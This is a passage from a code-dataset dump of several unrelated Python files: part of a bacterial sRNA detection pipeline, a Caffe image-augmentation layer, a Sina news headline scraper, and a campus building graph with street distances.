args_srna, prefix,\n os.path.join(args_srna.gffs, gff), tran, tss,\n pro, fuzzy_tss)\n intergenic_srna(args_srna)\n files[\"merge_csv\"] = \"_\".join([self.prefixs[\"normal_table\"], prefix])\n files[\"merge_gff\"] = \"_\".join([self.prefixs[\"normal\"], prefix])\n self._merge_frag_tex_file(files, args_srna)\n if \"TSS_class\" in os.listdir(args_srna.out_folder):\n tss = os.path.join(args_srna.out_folder,\n \"TSS_class\", prefix + \"_TSS.gff\")\n return tss\n\n def _run_utrsrna(self, gff, tran, prefix, tss, pro, args_srna):\n if \"tmp_median\" in os.listdir(args_srna.out_folder):\n os.remove(os.path.join(args_srna.out_folder, \"tmp_median\"))\n files = {\"frag_gff\": None, \"frag_csv\": None,\n \"tex_gff\": None, \"tex_csv\": None,\n \"merge_gff\": None, \"merge_csv\": None}\n if args_srna.tex_wigs is not None:\n files[\"tex_gff\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_utr_tex\", prefix]))\n files[\"tex_csv\"] = os.path.join(\n args_srna.out_folder,\n \"_\".join([\"tmp_utr_tex_table\", prefix]))\n args_srna = self.args_container.container_utrsrna(\n os.path.join(args_srna.gffs, gff), tran, tss, files,\n pro, os.path.join(self.fasta_path, prefix + \".fa\"),\n \"tex\", prefix, args_srna)\n utr_derived_srna(args_srna)\n if args_srna.frag_wigs is not None:\n files[\"frag_gff\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_utr_frag\", prefix]))\n files[\"frag_csv\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_utr_frag_table\", prefix]))\n args_srna = self.args_container.container_utrsrna(\n os.path.join(args_srna.gffs, gff), tran, tss, files,\n pro, os.path.join(self.fasta_path, prefix + \".fa\"),\n \"frag\", prefix, args_srna)\n utr_derived_srna(args_srna)\n files[\"merge_csv\"] = \"_\".join([self.prefixs[\"utr_table\"], prefix])\n files[\"merge_gff\"] = \"_\".join([self.prefixs[\"utr\"], prefix])\n self._merge_frag_tex_file(files, args_srna)\n filter_utr(files[\"merge_gff\"], files[\"merge_csv\"], args_srna.min_utr)\n\n def _check_necessary_file(self, args_srna):\n if (args_srna.gffs is None) or (args_srna.trans is None) or (\n (args_srna.tex_wigs is None) and (\n args_srna.frag_wigs is None)):\n print(\"Error: lack required files!!!!\")\n sys.exit()\n if args_srna.utr_srna:\n if (args_srna.tss_folder is None):\n print(\"Error: lack required TSS files for UTR \"\n \"derived sRNA detection!!!!\")\n sys.exit()\n if (args_srna.pro_folder is None):\n print(\"Warning: lack Processing site files for UTR \"\n \"derived sRNA detection!!!\")\n print(\"it may effect the results!!!!\")\n self._check_gff(args_srna.gffs)\n self._check_gff(args_srna.trans)\n if args_srna.tss_folder is not None:\n self._check_gff(args_srna.tss_folder)\n self.multiparser.parser_gff(args_srna.tss_folder, \"TSS\")\n self.multiparser.combine_gff(args_srna.gffs, self.tss_path,\n None, \"TSS\")\n if args_srna.pro_folder is not None:\n self._check_gff(args_srna.pro_folder)\n self.multiparser.parser_gff(args_srna.pro_folder, \"processing\")\n self.multiparser.combine_gff(args_srna.gffs, self.pro_path,\n None, \"processing\")\n if args_srna.sorf_file is not None:\n self._check_gff(args_srna.sorf_file)\n self.multiparser.parser_gff(args_srna.sorf_file, \"sORF\")\n self.multiparser.combine_gff(args_srna.gffs, self.sorf_path,\n None, \"sORF\")\n if args_srna.utr_srna or (\"sec_str\" in args_srna.import_info) or (\n \"blast_nr\" in args_srna.import_info) or (\n \"blast_srna\" in args_srna.import_info):\n if args_srna.fastas is None:\n print(\"Error: lack required fasta files for UTR \"\n \"derived sRNA detection!!!!\")\n sys.exit()\n self.multiparser.parser_fasta(args_srna.fastas)\n self.multiparser.combine_fasta(args_srna.gffs,\n self.fasta_path, None)\n if args_srna.terms is not None:\n self._check_gff(args_srna.terms)\n self.multiparser.parser_gff(args_srna.terms, \"term\")\n self.multiparser.combine_gff(args_srna.gffs, self.term_path,\n None, \"term\")\n else:\n self.term_path = None\n\n def _run_program(self, args_srna):\n prefixs = []\n tss = None\n for gff in os.listdir(args_srna.gffs):\n if gff.endswith(\".gff\"):\n prefix = gff.replace(\".gff\", \"\")\n prefixs.append(prefix)\n print(\"Running sRNA detection of {0}....\".format(prefix))\n tran = self.helper.get_correct_file(\n self.tran_path, \"_transcript.gff\", prefix, None, None)\n gffs = {\"merge\": \"_\".join([self.prefixs[\"merge\"], prefix]),\n \"utr\": \"_\".join([self.prefixs[\"utr\"], prefix]),\n \"normal\": \"_\".join([self.prefixs[\"normal\"], prefix])}\n csvs = {\"merge\": \"_\".join([\n self.prefixs[\"merge_table\"], prefix]),\n \"utr\": \"_\".join([self.prefixs[\"utr_table\"], prefix]),\n \"normal\": \"_\".join([\n self.prefixs[\"normal_table\"], prefix])}\n tss = self._run_normal(\n prefix, gff, tran, args_srna.fuzzy_tsss[\"inter\"],\n args_srna)\n if args_srna.utr_srna:\n print(\"Running UTR derived sRNA detection of {0}\".format(\n prefix))\n if tss is None:\n tss = self.helper.get_correct_file(\n self.tss_path, \"_TSS.gff\", prefix, None, None)\n if self.pro_path is not None:\n pro = self.helper.get_correct_file(\n self.pro_path, \"_processing.gff\",\n prefix, None, None)\n else:\n pro = None\n if tss is not None:\n self._run_utrsrna(gff, tran, prefix,\n tss, pro, args_srna)\n self._merge_srna(args_srna, gffs, csvs, prefix,\n os.path.join(args_srna.gffs, gff), tss)\n filter_frag(csvs[\"merge\"], gffs[\"merge\"])\n self.helper.sort_gff(gffs[\"merge\"],\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n return prefixs\n\n def _merge_srna(self, args_srna, gffs, csvs, prefix, gff_file, tss):\n print(\"merging data of intergenic and UTR_derived sRNA...\")\n merge_srna_gff(gffs, args_srna.in_cds,\n args_srna.cutoff_overlap, gff_file)\n merge_srna_table(gffs[\"merge\"], csvs, os.path.join(args_srna.wig_path,\n \"_\".join([prefix, \"forward.wig\"])),\n os.path.join(args_srna.wig_path,\n \"_\".join([prefix, \"reverse.wig\"])),\n tss, args_srna)\n\n def _run_RNAfold(self, seq_file, vienna_path, sec_file):\n os.system(\" \".join([\"cat\", seq_file, \"|\",\n os.path.join(vienna_path, \"RNAfold\"),\n \"-p\", \">\", sec_file]))\n\n def _get_seq_sec(self, fasta_path, out_folder, prefix, sec_path,\n dot_path, vienna_path):\n detect = False\n for fasta in os.listdir(fasta_path):\n if fasta.endswith(\".fa\") and (\n fasta.replace(\".fa\", \"\") == prefix):\n detect = True\n break\n if detect:\n detect = False\n seq_file = os.path.join(out_folder, \"_\".join([\"sRNA_seq\", prefix]))\n sec_file = os.path.join(out_folder, \"_\".join([\"sRNA_2d\", prefix]))\n self.helper.get_seq(\"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(fasta_path, fasta), seq_file)\n else:\n print(\"Error:There is not fasta file of {0}\".format(prefix))\n print(\"please check your imported information\")\n sys.exit()\n tmp_path = os.path.join(out_folder, \"tmp_srna\")\n self.helper.check_make_folder(tmp_path)\n main_path = os.getcwd()\n os.chdir(tmp_path)\n sec_file = os.path.join(main_path, sec_file)\n seq_file = os.path.join(main_path, seq_file)\n tmp_sec_path = os.path.join(main_path, sec_path)\n tmp_dot_path = os.path.join(main_path, dot_path)\n self._run_RNAfold(seq_file, vienna_path, sec_file)\n extract_energy(os.path.join(main_path,\n \"_\".join([self.prefixs[\"basic\"], prefix])),\n sec_file, os.path.join(main_path,\n \"_\".join([self.prefixs[\"energy\"], prefix])))\n for ps in os.listdir(os.getcwd()):\n new_ps = ps.replace(\"|\", \"_\")\n shutil.move(ps, new_ps)\n return {\"sec\": tmp_sec_path, \"dot\": tmp_dot_path, \"main\": main_path,\n \"tmp\": os.path.join(main_path, tmp_path)}\n\n def _run_replot(self, vienna_util, tmp_paths, file_, dot_file, rel_file):\n os.system(\" \".join([os.path.join(vienna_util, \"relplot.pl\"),\n os.path.join(tmp_paths[\"tmp\"], file_),\n os.path.join(tmp_paths[\"tmp\"], dot_file),\n \">\", os.path.join(tmp_paths[\"tmp\"], rel_file)]))\n\n def _convert_pdf(self, ps2pdf14_path, tmp_paths, file_, pdf_file):\n call([ps2pdf14_path, os.path.join(tmp_paths[\"tmp\"], file_), pdf_file])\n\n def _replot_sec_to_pdf(self, vienna_util, tmp_paths,\n ps2pdf14_path, prefix):\n for file_ in os.listdir(os.getcwd()):\n if file_.endswith(\"ss.ps\"):\n dot_file = file_.replace(\"ss.ps\", \"dp.ps\")\n rel_file = file_.replace(\"ss.ps\", \"rss.ps\")\n print(\"replot {0}\".format(file_))\n self._run_replot(vienna_util, tmp_paths, file_,\n dot_file, rel_file)\n for file_ in os.listdir(tmp_paths[\"tmp\"]):\n if (file_.endswith(\"rss.ps\")) or (file_.endswith(\"dp.ps\")):\n pdf_file = file_.replace(\".ps\", \".pdf\")\n print(\"convert {0} to pdf\".format(file_))\n self._convert_pdf(ps2pdf14_path, tmp_paths,\n file_, pdf_file)\n os.mkdir(os.path.join(tmp_paths[\"sec\"], prefix))\n os.mkdir(os.path.join(tmp_paths[\"dot\"], prefix))\n self.helper.move_all_content(\n tmp_paths[\"tmp\"], os.path.join(tmp_paths[\"sec\"], prefix),\n [\"rss.pdf\"])\n self.helper.move_all_content(\n tmp_paths[\"tmp\"], os.path.join(tmp_paths[\"dot\"], prefix),\n [\"dp.pdf\"])\n\n def _run_mountain(self, vienna_util, tmp_paths, dot_file, out):\n call([os.path.join(vienna_util, \"mountain.pl\"),\n os.path.join(tmp_paths[\"tmp\"], dot_file)], stdout=out)\n\n def _plot_mountain(self, mountain, moun_path,\n tmp_paths, prefix, vienna_util):\n if mountain:\n tmp_moun_path = os.path.join(tmp_paths[\"main\"], moun_path)\n os.mkdir(os.path.join(tmp_moun_path, prefix))\n txt_path = os.path.join(tmp_paths[\"tmp\"], \"tmp_txt\")\n self.helper.check_make_folder(txt_path)\n print(\"Generating mountain plot of {0}....\".format(prefix))\n for dot_file in os.listdir(tmp_paths[\"tmp\"]):\n if dot_file.endswith(\"dp.ps\"):\n moun_txt = os.path.join(tmp_paths[\"tmp\"], \"mountain.txt\")\n out = open(moun_txt, \"w\")\n moun_file = dot_file.replace(\"dp.ps\", \"mountain.pdf\")\n print(\"Generating {0}\".format(moun_file))\n self._run_mountain(vienna_util, tmp_paths, dot_file, out)\n plot_mountain_plot(moun_txt, moun_file)\n shutil.move(moun_file,\n os.path.join(tmp_moun_path, prefix, moun_file))\n out.close()\n os.remove(moun_txt)\n\n def _compute_2d_and_energy(self, args_srna, prefixs):\n print(\"Running energy calculation....\")\n moun_path = os.path.join(args_srna.out_folder, \"mountain_plot\")\n sec_path = os.path.join(args_srna.out_folder, \"sec_structure\",\n \"sec_plot\")\n dot_path = os.path.join(args_srna.out_folder, \"sec_structure\",\n \"dot_plot\")\n self.helper.remove_all_content(sec_path, None, \"dir\")\n self.helper.remove_all_content(dot_path, None, \"dir\")\n self.helper.remove_all_content(moun_path, None, \"dir\")\n for prefix in prefixs:\n tmp_paths = self._get_seq_sec(\n self.fasta_path, args_srna.out_folder, prefix, sec_path,\n dot_path, args_srna.vienna_path)\n self._replot_sec_to_pdf(args_srna.vienna_util, tmp_paths,\n args_srna.ps2pdf14_path, prefix)\n self._plot_mountain(args_srna.mountain, moun_path, tmp_paths,\n prefix, args_srna.vienna_util)\n self.helper.remove_all_content(os.getcwd(), \".ps\", \"file\")\n os.chdir(tmp_paths[\"main\"])\n shutil.move(\"_\".join([self.prefixs[\"energy\"], prefix]),\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n shutil.rmtree(os.path.join(args_srna.out_folder, \"tmp_srna\"))\n\n def _run_blast(self, blast_path, program, database, e, seq_file,\n blast_file, strand):\n call([os.path.join(blast_path, program), \"-db\", database,\n \"-evalue\", str(e), \"-strand\", strand, \"-query\", seq_file,\n \"-out\", blast_file])\n\n def _get_strand_fasta(self, seq_file, out_folder):\n tmp_plus = os.path.join(out_folder, \"tmp_plus.fa\")\n tmp_minus = os.path.join(out_folder, \"tmp_minus.fa\")\n out_p = open(tmp_plus, \"w\")\n out_m = open(tmp_minus, \"w\")\n strand = \"\"\n with open(seq_file) as sh:\n for line in sh:\n line = line.strip()\n if line.startswith(\">\"):\n if line[-1] == \"+\":\n out_p.write(line + \"\\n\")\n strand = \"plus\"\n elif line[-1] == \"-\":\n out_m.write(line + \"\\n\")\n strand = \"minus\"\n else:\n if strand == \"plus\":\n out_p.write(line + \"\\n\")\n elif strand == \"minus\":\n out_m.write(line + \"\\n\")\n out_p.close()\n out_m.close()\n return tmp_plus, tmp_minus\n\n def _blast(self, database, database_format, data_type, args_srna,\n prefixs, program, database_type, e):\n if (database is None):\n print(\"Error: No database assigned!\")\n else:\n if database_format:\n self._formatdb(database, data_type, args_srna.out_folder,\n args_srna.blast_path, database_type)\n for prefix in prefixs:\n blast_file = os.path.join(\n args_srna.out_folder, \"blast_result_and_misc\",\n \"_\".join([database_type, \"blast\", prefix + \".txt\"]))\n srna_file = \"_\".join([self.prefixs[\"basic\"], prefix])\n out_file = os.path.join(\n args_srna.out_folder,\n \"_\".join([\"tmp\", database_type, prefix]))\n print(\"Running Blast of {0}\".format(prefix))\n seq_file = os.path.join(\n args_srna.out_folder, \"_\".join([\"sRNA_seq\", prefix]))\n if seq_file not in os.listdir(args_srna.out_folder):\n self.helper.get_seq(\n srna_file,\n os.path.join(self.fasta_path, prefix + \".fa\"),\n seq_file)\n if database_type == \"nr\":\n tmp_plus, tmp_minus = self._get_strand_fasta(\n seq_file, args_srna.out_folder)\n tmp_blast = os.path.join(\"tmp_blast.txt\")\n self._run_blast(args_srna.blast_path, program, database, e,\n tmp_plus, tmp_blast, \"plus\")\n self._run_blast(args_srna.blast_path, program, database, e,\n tmp_minus, blast_file, \"minus\")\n self.helper.merge_file(tmp_blast, blast_file)\n os.remove(tmp_blast)\n os.remove(tmp_plus)\n os.remove(tmp_minus)\n else:\n self._run_blast(args_srna.blast_path, program, database, e,\n seq_file, blast_file, \"both\")\n extract_blast(blast_file, srna_file, out_file,\n out_file + \".csv\", database_type)\n shutil.move(out_file, srna_file)\n\n def _class_srna(self, prefixs, args_srna):\n if (len(args_srna.import_info) != 1) or (\n len(args_srna.import_info) != 0):\n for prefix in prefixs:\n print(\"classifying sRNA of {0}\".format(prefix))\n class_gff = os.path.join(self.gff_output, \"for_class\")\n class_table = os.path.join(self.table_output, \"for_class\")\n self.helper.check_make_folder(os.path.join(class_table,\n prefix))\n self.helper.check_make_folder(os.path.join(class_gff, prefix))\n class_gff = os.path.join(class_gff, prefix)\n class_table = os.path.join(class_table, prefix)\n self.helper.check_make_folder(class_table)\n self.helper.check_make_folder(class_gff)\n out_stat = os.path.join(\n self.stat_path, \"_\".join([\n \"stat_sRNA_class\", prefix + \".csv\"]))\n classify_srna(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])), class_gff,\n out_stat, args_srna)\n for srna in os.listdir(class_gff):\n out_table = os.path.join(\n class_table, srna.replace(\".gff\", \".csv\"))\n gen_srna_table(\n os.path.join(class_gff, srna),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, out_table)\n\n def _get_best_result(self, prefixs, args_srna):\n for prefix in prefixs:\n best_gff = os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n gen_best_srna(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n best_gff, args_srna)\n gen_srna_table(os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, best_table)\n\n def _remove_file(self, args_srna):\n self.helper.remove_all_content(args_srna.out_folder, \"tmp_\", \"dir\")\n self.helper.remove_all_content(args_srna.out_folder, \"tmp_\", \"file\")\n self.helper.remove_tmp(args_srna.fastas)\n self.helper.remove_tmp(args_srna.gffs)\n if args_srna.frag_wigs is not None:\n self.helper.remove_tmp(args_srna.frag_wigs)\n if args_srna.tex_wigs is not None:\n self.helper.remove_tmp(args_srna.tex_wigs)\n if (args_srna.frag_wigs is not None) and (\n args_srna.tex_wigs is not None):\n shutil.rmtree(args_srna.merge_wigs)\n self.helper.remove_tmp(args_srna.trans)\n if args_srna.tss_folder is not None:\n self.helper.remove_tmp(args_srna.tss_folder)\n if args_srna.pro_folder is not None:\n self.helper.remove_tmp(args_srna.pro_folder)\n if args_srna.sorf_file is not None:\n self.helper.remove_tmp(args_srna.sorf_file)\n if \"tmp_median\" in os.listdir(args_srna.out_folder):\n os.remove(os.path.join(args_srna.out_folder, \"tmp_median\"))\n if self.term_path is not None:\n self.helper.remove_tmp(args_srna.terms)\n\n def _filter_srna(self, args_srna, prefixs):\n if \"sec_str\" in args_srna.import_info:\n self._compute_2d_and_energy(args_srna, prefixs)\n if \"blast_nr\" in args_srna.import_info:\n self._blast(args_srna.nr_database, args_srna.nr_format, \"prot\",\n args_srna, prefixs, \"blastx\", \"nr\", args_srna.e_nr)\n if \"blast_srna\" in args_srna.import_info:\n self._blast(args_srna.srna_database, args_srna.srna_format, \"nucl\",\n args_srna, prefixs, \"blastn\", \"sRNA\", args_srna.e_srna)\n if \"sorf\" in args_srna.import_info:\n for prefix in prefixs:\n if (\"_\".join([prefix, \"sORF.gff\"]) in\n os.listdir(self.sorf_path)):\n tmp_srna = os.path.join(args_srna.out_folder,\n \"\".join([\"tmp_srna_sorf\", prefix]))\n tmp_sorf = os.path.join(args_srna.out_folder,\n \"\".join([\"tmp_sorf_srna\", prefix]))\n srna_sorf_comparison(\n \"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(self.sorf_path,\n \"_\".join([prefix, \"sORF.gff\"])),\n tmp_srna, tmp_sorf)\n os.remove(tmp_sorf)\n shutil.move(tmp_srna,\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n\n def _import_info_format(self, import_info):\n new_info = []\n for info in import_info:\n info = info.lower()\n new_info.append(info)\n return new_info\n\n def _gen_table(self, prefixs, args_srna):\n for prefix in prefixs:\n out_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n gen_srna_table(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, out_table)\n\n def _print_rank_all(self, prefixs):\n for prefix in prefixs:\n all_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n print_rank_all(all_table, best_table)\n\n def _filter_min_utr(self, prefixs, min_utr):\n for prefix in prefixs:\n filter_utr(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"])), min_utr)\n\n def _antisense(self, gffs, prefixs):\n for prefix in prefixs:\n all_table = os.path.join(self.all_best[\"all_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n all_gff = os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n best_gff = os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n srna_antisense(all_gff, all_table,\n os.path.join(gffs, prefix + \".gff\"))\n srna_antisense(best_gff, best_table,\n os.path.join(gffs, prefix + \".gff\"))\n\n def _blast_stat(self, stat_path, srna_tables):\n for srna_table in os.listdir(os.path.join(srna_tables, \"best\")):\n out_srna_blast = os.path.join(\n stat_path, \"stat_\" +\n srna_table.replace(\".csv\", \"_blast.csv\"))\n blast_class(os.path.join(srna_tables, \"best\", srna_table),\n out_srna_blast)\n\n def _compare_term_promoter(self, out_table, prefix, args_srna):\n if (\"term\" in args_srna.import_info) and (\n self.term_path is not None):\n compare_srna_term(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n out_table, os.path.join(self.term_path,\n \"_\".join([prefix, \"term.gff\"])),\n args_srna.fuzzy_b, args_srna.fuzzy_a)\n if (\"promoter\" in args_srna.import_info) and (\n args_srna.promoter_table is not None) and (\n \"tss\" in args_srna.import_info):\n compare_srna_promoter(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n out_table, args_srna)\n\n def run_srna_detection(self, args_srna):\n self._check_necessary_file(args_srna)\n self.multiparser.parser_gff(args_srna.trans, \"transcript\")\n self.multiparser.combine_gff(args_srna.gffs, self.tran_path,\n None, \"transcript\")\n args_srna.import_info = self._import_info_format(args_srna.import_info)\n prefixs = self._run_program(args_srna)\n self._filter_srna(args_srna, prefixs)\n for prefix in prefixs:\n shutil.copyfile(\"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])))\n self._compare_term_promoter(\"_\".join([self.prefixs[\"merge_table\"],\n prefix]), prefix, args_srna)\n self._gen_table(prefixs, args_srna)\n self._class_srna(prefixs, args_srna)\n self._get_best_result(prefixs, args_srna)\n self._print_rank_all(prefixs)\n if \"blast_srna\" in args_srna.import_info:\n self._blast_stat(self.stat_path, self.table_output)\n self._remove_file(args_srna)\n","sub_path":"annogesiclib/srna.py","file_name":"srna.py","file_ext":"py","file_size_in_byte":36293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"626939061","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 11 22:37:28 2017\n\n@author: chandler\n\"\"\"\n#import sys\n#sys.path.append('/home/chandlev/caffe/python/')\nimport caffe;\nimport numpy.random\nimport math;\n\n#class SimpleLayer(caffe.Layer):\n# \"\"\"A layer that just multiplies by ten\"\"\"\n#\n# def setup(self, bottom, top):\n# pass\n#\n# def reshape(self, bottom, top):\n# top[0].reshape(*bottom[0].data.shape)\n#\n# def forward(self, bottom, top):\n# top[0].data[...] = 10 * bottom[0].data\n#\n# def backward(self, top, propagate_down, bottom):\n# bottom[0].diff[...] = 10 * top[0].diff\n \nclass AugmentLayer(caffe.Layer):\n \"\"\"A layer that do data augmentation for hdf5 dataset\"\"\"\n\n def setup(self, bottom, top):\n if len(bottom) != 2:\n raise Exception(\"Need both data and label input.\") \n \n params = eval(self.param_str)\n \n if 'mirror_rate' in params:\n self.mirror_rate = params['mirror_rate'];\n else:\n self.mirror_rate = 0.5;\n \n self.flip_indices = [\n (0, 2), (1, 3),\n (4, 8), (5, 9), (6, 10), (7, 11),\n (12, 16), (13, 17), (14, 18), (15, 19),\n (22, 24), (23, 25),\n ]\n\n\n def reshape(self, bottom, top):\n top[0].reshape(*bottom[0].data.shape)\n top[0].reshape(*bottom[0].data.shape)\n\n def forward(self, bottom, top):\n batch_size = bottom[0].data.shape[0];\n \n# choose image to mirror based on mirror rate\n indices = numpy.random.choice(batch_size,int(math.floor(batch_size*self.mirror_rate)),replace=False);\n \n# mirror the selected images\n top[0].data[...] = bottom[0].data;\n top[0].data[indices] = top[0].data[indices,:,:,::-1];\n \n# reverse all the x coordinated\n top[1].data[...] = bottom[1].data;\n top[1].data[indices,::2] = top[1].data[indices,::2] * -1;\n# swap left and right organic\n for a,b in self.flip_indices:\n top[1].data[indices,a],top[1].data[indices,b] = (\n top[1].data[indices,b],top[1].data[indices,a] \n )\n \n def backward(self, top, propagate_down, bottom):\n pass","sub_path":"AugmentLayer.py","file_name":"AugmentLayer.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44496710","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport requests\nimport sys\nimport argparse\nfrom queue import Queue\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWidgets import QWidget\n\nclass Proxy():\n def __init__(self,url):\n# super().__init__()\n# self.initUI()\n self._url = url\n self._positionurl = ''\n self._newslist = list()\n\n def getnews(self):\n try:\n news = requests.get(self._url)\n except Exception as e:\n print (e)\n soup = BeautifulSoup(news.content)\n list = soup.find_all('a')\n for i in list:\n nlist = []\n try:\n if i['href'].startswith(\"http://news.sina.com.cn/\"):\n nlist.append(i.string)\n nlist.append(i['href'])\n self._newslist.append(nlist)\n except Exception as e:\n print(e)\n\n def shownews(self):\n i = 1\n for h in self._newslist:\n if h[0] is not None:\n print('{}. {}'.format(i,h[0]))\n i += 1\n num = input('你想要浏览的新闻:')\n num = int(num)-1\n self._positionurl = self._newslist[num]\n\n def readnews(self):\n try:\n res = requests.get(self._positionurl[1],timeout=4)\n soup = BeautifulSoup(res.content)\n reader = soup.find_all('p')\n except Exception as e:\n print(e)\n print('\\n\\t标题: {}'.format(self._positionurl[0]))\n print('\\n\\n')\n for i in reader:\n if i.string is not None:\n print(i.string)\n\nif __name__ == '__main__':\n ex = Proxy('http://news.sina.com.cn/')\n ex.getnews()\n ex.shownews()\n ex.readnews()\n","sub_path":"pyxinwen/pyxinwen.py","file_name":"pyxinwen.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"154048717","text":"import networkx as nx\nimport pandas as pd\n\n\nclass BuildingGraph():\n def __init__(self):\n # building = {building_name:{mail_address, mail_code}}\n self.buildings = {'Foreign Language Buildings': {'address': '707 S. Matthews Ave., Urbana', 'code': '164',\n 'access': 'S. Matthews Avenue'},\n 'Davenport Hall': {'address': '607 S. Mathews, Urbana', 'code': '148',\n 'access': 'S. Matthews Avenue'},\n 'Observatory': {'address': '901 S. Mathews, Urbana', 'code': '190',\n 'access': 'S. Matthews Avenue'},\n 'Undergrad Library': {'address': '1408 W. Gregory, Urbana', 'code': '522',\n 'access': 'W. Gregory'},\n 'Armory': {'address': '505 E. Armory, Champaign', 'code': '532', 'access': 'E. Armory'},\n 'Ice Arena': {'address': '406 E. Armory, Champaign', 'code': '525',\n 'access': 'S. 5th Street'},\n 'Lincoln Hall': {'address': '702 S. Wright, Urbana', 'code': '456',\n 'access': 'S. Wright Street'},\n 'Gregory Hall': {'address': '810 S. Wright, Urbana', 'code': '462',\n 'access': 'S. Wright Street'},\n 'Psych Bldg': {'address': '603 E. Daniel, Champaign', 'code': '716',\n 'access': 'S. 6th Street'},\n 'Library & Information Sci': {'address': '501 E. Daniel, Champaign', 'code': '493',\n 'access': 'E. Daniel Street'},\n 'SPEECH AND HEARING SCIENCE': {'address': '901 S. Sixth, Champaign', 'code': '482',\n 'access': 'E. Daniel Street'},\n 'Illini Union BookStore': {'address': '807 S. Wright, Champaign', 'code': '323',\n 'access': 'S. Wright Street'},\n 'Coble Hall': {'address': '801 S. Wright, Champaign', 'code': '322',\n 'access': 'S. Wright Street'},\n 'Illini Hall': {'address': '721 S. Wright, Champaign', 'code': '374',\n 'access': 'S Wright Street'},\n 'Arcade Bldg': {'address': '620 E. John, Champaign', 'code': '303',\n 'access': 'S. Wright Street'},\n 'School of Nursing': {'address': '905 S. Goodwin, Urbana', 'code': '186',\n 'access': 'S. Goodwin'},\n 'Burrill Hall': {'address': '407 S. Goodwin, Urbana', 'code': '114', 'access': 'S. Goodwin'},\n 'Medical Sciences Building': {'address': '506 S. Mathews, Urbana', 'code': '714',\n 'access': 'S Matthews Avenue'},\n 'Chem & Life Sci Lab (CLSL)': {'address': '601 S. Goodwin, Urbana', 'code': '123',\n 'access': 'S Goodwin'},\n 'Altgeld Hall': {'address': '1409 W. Green, Urbana', 'code': '382',\n 'access': 'S. Wright Street'}\n }\n\n # intersection = [street_name-street_name]\n self.intersections = ['S. Goodwin-W. Gregory', 'S. Goodwin-W. Green Street',\n 'W. Green Street-S. Matthews Avenue',\n 'E. Green Street-S. Wright Street-W. Green Street', 'E. Green-S. 6th Street',\n 'S. 6th Street-E. Daniel',\n 'E. Daniel-S. Wright Street', 'S. 5th Street-E. Daniel',\n 'S 6th Street-E. Armory', 'S. Wright Street-E. Armory',\n 'S. 6th Street-E. Gregory',\n 'S. Goodwin-W. Oregon Street',\n 'S. 5th Street-E. Armory']\n\n # edge = {building_name:{adjacent_node:{distance, street_name, street_direction}}}\n self.edges = {\n 'Foreign Language Buildings': {\n 'Davenport Hall': {'distance': 370, 'name': 'S. Matthews Avenue', 'direction': 'North'},\n 'Observatory': {'distance': 378, 'name': 'S. Matthews Avenue', 'direction': 'South'}},\n\n 'Davenport Hall': {\n 'Foreign Language Buildings': {'distance': 370, 'name': 'S. Matthews Avenue', 'direction': 'South'},\n 'Medical Sciences Building': {'distance': 430, 'name': 'S. Matthews Avenue', 'direction': 'North'}},\n\n 'Observatory': {\n 'Foreign Language Buildings': {'distance': 378, 'name': 'S. Matthews Avenue', 'direction': 'North'}},\n\n 'Undergrad Library': {\n 'S. Goodwin-W. Gregory': {'distance': 941, 'name': 'W. Gregory', 'direction': 'East'},\n 'S. 6th Street-E. Gregory': {'distance': 490, 'name': 'W. Gregory', 'direction': 